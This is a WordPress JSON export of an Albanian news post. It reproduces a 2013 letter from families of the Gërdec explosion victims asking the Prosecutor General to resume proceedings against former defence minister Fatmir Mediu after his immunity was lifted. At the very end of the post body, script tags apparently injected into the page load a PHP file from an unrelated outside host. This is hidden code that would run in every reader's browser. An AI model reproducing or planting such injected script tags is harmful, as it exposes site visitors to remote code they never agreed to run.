{"id":476,"date":"2013-03-15T11:34:06","date_gmt":"2013-03-15T09:34:06","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=476"},"modified":"2013-09-30T11:36:16","modified_gmt":"2013-09-30T09:36:16","slug":"shoqata-e-familjareve-te-viktimave-te-shperthimit-te-gerdecit-te-gjykohet-fatmir-mediu-sepse-qe-sot-nuk-ka-me-imunitet","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=476","title":{"rendered":"Shoqata e Familjar\u00ebve t\u00eb Viktimave t\u00eb Shp\u00ebrthimit t\u00eb G\u00ebrdecit: T\u00eb gjykohet Fatmir Mediu sepse q\u00eb sot nuk ka m\u00eb imunitet"},"content":{"rendered":"<p>Shoqata e Familjar\u00ebve t\u00eb Viktimave t\u00eb Shp\u00ebrthimit t\u00eb G\u00ebrdecit, dhe p\u00ebrfaq\u00ebsuesit e 70 familjar\u00ebve t\u00eb 18 viktimave t\u00eb shp\u00ebrthimit t\u00eb G\u00ebrdecit i jan\u00eb drejtuar me nj\u00eb let\u00ebr Kryeprokurores Ina Rama, duke i k\u00ebrkuar asaj q\u00eb t\u00eb k\u00ebrkoj\u00eb rinisjen e gjykimit ndaj ish Ministrit t\u00eb Mbrojtjes Fatmir Mediu, pasi ai q\u00eb sot nuk ka m\u00eb imunitet.<\/p>\n<p>Nj\u00eb kopje e letr\u00ebs u \u00ebsht\u00eb d\u00ebrguar edhe Delegacionit t\u00eb BE,\u00a0OSBE-s\u00eb,\u00a0OKB-s\u00eb, duke\u00a0cituar edhe q\u00ebndrimet e tyre p\u00ebr k\u00ebt\u00eb \u00e7\u00ebshtje. Ata nj\u00ebz\u00ebri kan\u00eb k\u00ebrkuar zbardhjen e plot\u00eb t\u00eb ngjarjes.<\/p>\n<p>P\u00ebrmbajtja e letr\u00ebs:<\/p>\n<p><em>E nderuar Znj. Prokurore e P\u00ebrgjithshme,<\/em><\/p>\n<p><em>N\u00eb em\u00ebr t\u00eb Shoqat\u00ebs s\u00eb Familjar\u00ebve t\u00eb Viktimave t\u00eb Shp\u00ebrthimit t\u00eb G\u00ebrdecit dhe n\u00eb em\u00ebr t\u00eb disa prej t\u00eb d\u00ebmtuarve nga shp\u00ebrthimi i G\u00ebrdecit m\u00eb 15.03.2008, po Ju drejtohemi Juve me nj\u00eb k\u00ebrkes\u00eb, t\u00eb p\u00ebrs\u00ebritur n\u00eb p\u00ebrmbajtje p\u00ebr Ju dhe p\u00ebr opinionin publik, por q\u00eb ka mbetur e pazgjidhur dhe e pap\u00ebrfunduar n\u00eb thelbin e saj.<\/em><\/p>\n<p><em>Shoqata jon\u00eb dhe t\u00eb gjith\u00eb familjar\u00ebt e viktimave, t\u00eb plagosurve dhe t\u00eb d\u00ebmtuarve materialisht, k\u00ebrkojn\u00eb v\u00ebnien e t\u00eb gjith\u00eb personave q\u00eb dyshohen si p\u00ebrgjegj\u00ebs p\u00ebrpara drejt\u00ebsis\u00eb, jo vet\u00ebm ata 29 t\u00eb pandehur q\u00eb priten t\u00eb gjykohen n\u00eb Gjykat\u00ebn e Apelit, por edhe t\u00eb Fatmir Mediut, ndaj t\u00eb cilit ende nuk \u00ebsht\u00eb zhvilluar asnj\u00eb seanc\u00eb.<\/em><\/p>\n<p><em>Kjo tragjedi ka l\u00ebn\u00eb pas dhe nj\u00eb pafund\u00ebsi me probleme q\u00eb po persekutojn\u00eb familjar\u00ebt, sikur t\u00eb mos mjaftonte r\u00ebndimi shpirt\u00ebror, moral e psikologjik i tyre. Vet\u00ebvrasja e Kujtim Osmanit \u00ebsht\u00eb nj\u00eb tjet\u00ebr pasoj\u00eb e drejtp\u00ebrdrejt\u00eb e munges\u00ebs s\u00eb v\u00ebmendjes s\u00eb shtetit ndaj pasojave t\u00eb tragjedis\u00eb, sepse pas humbjes s\u00eb vajz\u00ebs s\u00eb tij, ai \u00ebsht\u00eb p\u00ebrballur edhe me v\u00ebshtir\u00ebsi t\u00eb m\u00ebdha ekonomike, papun\u00ebsi dhe probleme t\u00eb tjera individuale e sociale, t\u00eb cilat kan\u00eb ardhur nga depresioni i shkaktuar pas shp\u00ebrthimit. Pak muaj m\u00eb par\u00eb ka humbur jet\u00ebn si pasoj\u00eb e depresionit dhe p\u00ebrkeq\u00ebsimit sh\u00ebndet\u00ebsor e psikologjik edhe e ndjera Naile Ahmeti, duke rritur numrin e viktimave. Kjo situat\u00eb e r\u00ebnduar q\u00eb nga data e shp\u00ebrthimit e n\u00eb vazhdim, ka detyrimin jo vet\u00ebm moral, por edhe ligjor, q\u00eb t\u00eb marr\u00eb zgjidhje.<\/em><\/p>\n<p><em>Tashm\u00eb Kuvendi ka miratuar heqjen e penges\u00ebs normative p\u00ebr t\u00eb ndjekur penalisht deputet\u00ebt. Ky kuad\u00ebr i ri normativ p\u00ebr imunitetet e deputet\u00ebve, krijon premisat e duhura p\u00ebr angazhimin Tuaj si institucion n\u00eb k\u00ebt\u00eb aksion n\u00eb em\u00ebr t\u00eb drejt\u00ebsis\u00eb. M\u00eb 11 tetor 2012 ndryshimi p\u00ebrkat\u00ebs i Kushtetut\u00ebs \u00ebsht\u00eb botuar n\u00eb Fletoren Zyrtare dhe nga data 26 tetor ka hyr\u00eb n\u00eb fuqi, duke e b\u00ebr\u00eb konkrete mund\u00ebsin\u00eb tuaj p\u00ebr t\u00eb vijuar ndjekjen penale t\u00eb shtetasit Fatmir Mediu, si i vetmi person i p\u00ebrfshir\u00eb por ende i pagjykuar p\u00ebr tragjedin\u00eb e G\u00ebrdecit, pik\u00ebrisht p\u00ebr shkak t\u00eb imunitetit q\u00eb tashm\u00eb nuk e g\u00ebzon m\u00eb.<\/em><\/p>\n<p><em>N\u00eb k\u00ebt\u00eb situat\u00eb, presim nga ana Juaj t\u00eb rinisni veprimet aty ku kan\u00eb ndalur n\u00eb dat\u00ebn 14 shtator 2009, n\u00eb koh\u00ebn kur Gjykata e Lart\u00eb konstatoi se Fatmir Mediu kishte s\u00ebrish mbrojtje nga imuniteti i ri i fituar n\u00eb zgjedhjet e vitit 2009. K\u00ebrkojm\u00eb nga institucioni Juaj q\u00eb t\u00eb \u00e7oj\u00eb p\u00ebrpara drejt\u00ebsis\u00eb deputetin dhe ministrin e akuzuar duke q\u00ebn\u00eb se si\u00e7 na u komunikua n\u00eb at\u00eb koh\u00eb, imuniteti i ri ishte e vetmja penges\u00eb q\u00eb Gjykata e Lart\u00eb t\u00eb vazhdonte gjykimin. Kujtojm\u00eb k\u00ebtu se pas pushimit t\u00eb \u00e7\u00ebshtjes, Juve nuk keni proceduar m\u00eb tej pasi nevojitej nj\u00eb autorizim i ri nga Kuvendi, nd\u00ebrkoh\u00eb q\u00eb p\u00ebrfaq\u00ebsuesi Juaj ka deklaruar p\u00ebrpara Gjykat\u00ebs s\u00eb Lart\u00eb n\u00eb procesin e nisur prej Shoqat\u00ebs son\u00eb se Prokuroria e P\u00ebrgjithshme nuk ka nisur p\u00ebr her\u00eb t\u00eb dyt\u00eb k\u00ebrkes\u00ebn p\u00ebr heqjen e imunitetit pasi \u201cjemi n\u00eb nj\u00eb situat\u00eb t\u00eb paqart\u00eb juridike\u201d.<\/em><\/p>\n<p><em>Tashm\u00eb me heqjen e nevoj\u00ebs p\u00ebr autorizim p\u00ebr nisjen e ndjekjes penale dhe p\u00ebr gjykimin e deputet\u00ebve, situata juridike \u00ebsht\u00eb shum\u00eb e qart\u00eb. Veprimet q\u00eb kan\u00eb nevoj\u00eb p\u00ebr autorizim tashm\u00eb jan\u00eb vet\u00ebm v\u00ebnia n\u00eb arrest dhe kontrolli i banes\u00ebs s\u00eb deputetit, t\u00eb cilat n\u00eb rastin konkret nuk jan\u00eb t\u00eb domosdoshme dhe procedimi mund t\u00eb vijoj\u00eb fare mir\u00eb pa iu referuar k\u00ebtyre procedurave.<\/em><\/p>\n<p><em>Ju kujtojm\u00eb se n\u00eb m\u00ebnyr\u00eb t\u00eb p\u00ebrs\u00ebritur edhe institucionet nd\u00ebrkomb\u00ebtare jan\u00eb shprehur p\u00ebr problematik\u00ebn e hetimeve t\u00eb shp\u00ebrthimit t\u00eb G\u00ebrdecit. N\u00eb raportin e fundit t\u00eb Kombeve t\u00eb Bashkuara, Prokurorit t\u00eb P\u00ebrgjithsh\u00ebm i k\u00ebrkohet shprehimisht q\u00eb t\u00eb vendos\u00eb p\u00ebrpara p\u00ebrgjegj\u00ebsis\u00eb t\u00eb gjitha pal\u00ebt, dhe se p\u00ebr k\u00ebt\u00eb duhet t\u00eb k\u00ebrkohet, n\u00eb rastet e nevojshme, edhe heqja e imunitetit.<\/em><\/p>\n<p><em>Shqet\u00ebsim p\u00ebr trajtimin e \u00e7\u00ebshtjes n\u00eb Gjykat\u00ebn e Lart\u00eb \u00ebsht\u00eb shprehur edhe n\u00eb raportin e Komisionit Europian t\u00eb dat\u00ebs 10.10.2012, sipas t\u00eb cilit, p\u00ebr k\u00ebt\u00eb \u00e7\u00ebshtje hetimet e plota nuk jan\u00eb b\u00ebr\u00eb p\u00ebr shkak t\u00eb mos heqjes p\u00ebr her\u00eb t\u00eb dyt\u00eb t\u00eb imunitetit. Raporti p\u00ebrmend gjithashtu edhe \u00e7\u00ebshtjen tjet\u00ebr t\u00eb nisur nga vet\u00eb t\u00eb plagosurit, q\u00eb Gjykata e Lart\u00eb e pushoi padrejt\u00ebsisht, por q\u00eb me vendimin nr. 27 dt. 09.05.2012 t\u00eb Gjykat\u00ebs Kushtetuese iu kthye p\u00ebr gjykim Gjykat\u00ebs s\u00eb Lart\u00eb.<\/em><\/p>\n<p><em>Ne besojm\u00eb se \u00e7\u00ebshtja e G\u00ebrdecit \u00ebsht\u00eb nj\u00eb sprov\u00eb e madhe p\u00ebr t\u00eb gjitha institucionet. Heqja e imunitetit nga Kuvendi tregoi se ka vullnet p\u00ebr t\u2019i ballafaquar deputet\u00ebt dhe zyrtar\u00ebt e lart\u00eb me drejt\u00ebsin\u00eb. Pesha e ngjarjes s\u00eb G\u00ebrdecit, humbjet e jet\u00ebve t\u00eb 26 t\u00eb dashurve tan\u00eb m\u00eb t\u00eb af\u00ebrt, duhet t\u00eb jen\u00eb nj\u00eb shtys\u00eb e fort\u00eb q\u00eb drejt\u00ebsia t\u00eb shprehet deri n\u00eb fund. Vet\u00ebm pasi gjykatat t\u00eb jen\u00eb shprehur p\u00ebr t\u00eb gjith\u00eb personat e p\u00ebrfshir\u00eb ne do t\u00eb kemi fituar qet\u00ebsin\u00eb p\u00ebr t\u00eb vazhduar p\u00ebrpara.<\/em><\/p>\n<p><em>Duke shprehur konsiderat\u00ebn ton\u00eb m\u00eb t\u00eb lart\u00eb p\u00ebr pun\u00ebn Tuaj t\u00eb deritanishme mbetemi n\u00eb pritje t\u00eb zbardhjes s\u00eb \u00e7\u00ebshtjes deri n\u00eb fund.<\/em><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Shoqata e Familjar\u00ebve t\u00eb Viktimave t\u00eb Shp\u00ebrthimit t\u00eb G\u00ebrdecit, dhe p\u00ebrfaq\u00ebsuesit e 70 familjar\u00ebve t\u00eb 18 viktimave t\u00eb shp\u00ebrthimit t\u00eb [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":477,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,5],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/476"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=476"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/476\/revisions"}],"predecessor-version":[{"id":478,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/476\/revisions\/478"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/477"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=476"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=476"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=476"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}